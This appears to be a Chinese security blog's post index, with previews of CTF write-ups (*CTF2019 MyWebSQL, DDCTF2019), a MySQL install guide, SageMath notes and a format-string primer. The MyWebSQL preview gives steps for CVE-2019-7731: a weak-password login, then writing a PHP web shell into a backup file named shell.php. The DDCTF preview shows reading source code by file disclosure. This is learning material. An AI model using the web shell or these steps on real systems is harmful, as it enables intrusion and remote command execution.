*CTF2019-MYWEBSQL WRITEUP

比赛时卡在了执行readflag赛后复现2333 环境还在:http://35.243.82.53:10080/ 首页是MyWebSQL登录界面 猜测用户名弱密码 root root admin admin …… admin admin登录成功 谷歌MyWebSQL CVE 发现了CVE-2019-7731,正好是最近的漏洞,出题人的最爱,点进去看到有一篇分析 有漏洞复现过程: Create a test table (code) and write a shell code in this table. 创建表,写入shell语句 Execute Backup Database function and modify Backup filename as shell.php. 备份数据表,名称改为shell.php 示例语句为 <?php system($_POST[cmd]); ?> Browse (domain)/mywebsql/backups/shell.php?cmd=XXX. Here instance is cmd=ipconfig Read more…

WINDOWS 安装MYSQL 5.7 & 8.0

前言 想安装mysql的高版本看看语句有什么变化,emmm,windows命令不过关,坑了好久 开始 下载ZIP安装包解压 需要管理员cmd进入bin目录 安装mysql服务 mysqld –install 初始化 mysqld –initialize –console data文件夹需要为空 要记住初始密码 …… 2019-04-26T15:16:47.727250Z 1 [Note] A temporary password is generated for root@localhost: 5zMG(Jkp8.M1 启动服务 net start mysql 进入mysql会强制修改密码,否则不允许操作 ALTER USER ‘root’@’localhost’ IDENTIFIED WITH mysql_native_password BY ‘root’; 其他命令 停止服务 net stop mysql 删除服务 sc delete mysql phpstudy更换MYSQL5.7 MYSQL服务要删除 Read more…

SageMath 学习(不断更新)

SageMath 是一个基于GPL协议的开源数学软件。它使用Python作为通用接口,将现有的许多开源软件包整合在一起,构建一个统一的计算平台。记录一下用法 在线使用:https://sagecell.sagemath.org/ 变量定义 var(‘x’) 数学计算 x = var(x) f(x)=(1+5*ln(x))/x print 2*integral(f(x),x,1,e) x = var(‘x’) f(x)=(pow(x,2)-1)/(x-1) lim(f(x),x=1)

DDCTF2019 WRITEUP

前言 滴滴这七天,除了两天周末,然后就是执勤,回来学校都6点多了,没什么时间做题,如果上课真的我就逃课玩了……执勤逃不了,而且很累,但是还是太菜了,有些题大佬们都是秒掉的,我也想拿实习offer!!! 比赛地址:https://ddctf.didichuxing.com/ WEB 滴 curl http://117.51.150.246/index.php -I HTTP/1.1 200 OK Date: Fri, 19 Apr 2019 12:23:14 GMT Server: Apache/2.4.7 (Unix) PHP/5.4.26 X-Powered-By: PHP/5.4.26 Refresh: 0;url=./index.php?jpg=TmpZMlF6WXhOamN5UlRaQk56QTJOdz09 Content-Type: text/html;charset=utf-8 猜测jpg后是base64编码 echo TmpZMlF6WXhOamN5UlRaQk56QTJOdz09|base64 -d | base64 -d 666C61672E6A7067 然后hex解码 py2 -c “print ‘666C61672E6A7067’.decode(‘hex’)” flag.jpg 于是构造读取index.php源码 http://117.51.150.246/index.php?jpg=J05qazJaVFkwTmpVM09ESmxOekEyT0Rjdw== index.php <?php /* * https://blog.csdn.net/FengBanLiuYun/article/details/80616607 * Read more…

PWN 格式化字符串漏洞学习

前言 感谢江师傅带我搞了格式化字符串这类漏洞,感觉基础汇编还不太过关,C语言语法还不过关。第一次写pwn的文章,可能会有很多术语用的不对。 PRINTF 语法: – %d – 十进制 – 输出十进制整数 – %s – 字符串 – 从内存中读取字符串 – %x – 十六进制 – 输出十六进制数 – %c – 字符 – 输出字符 – %p – 指针 – 指针地址 – %n – 到目前为止所写的字符数 例子: 可以参考https://ctf-wiki.github.io/ctf-wiki/pwn/linux/fmtstr/fmtstr_intro/了解原理,这里不班门弄斧了。 漏洞原理 Demo #include <stdio.h> int main() { while(1){ char s[100]; Read more…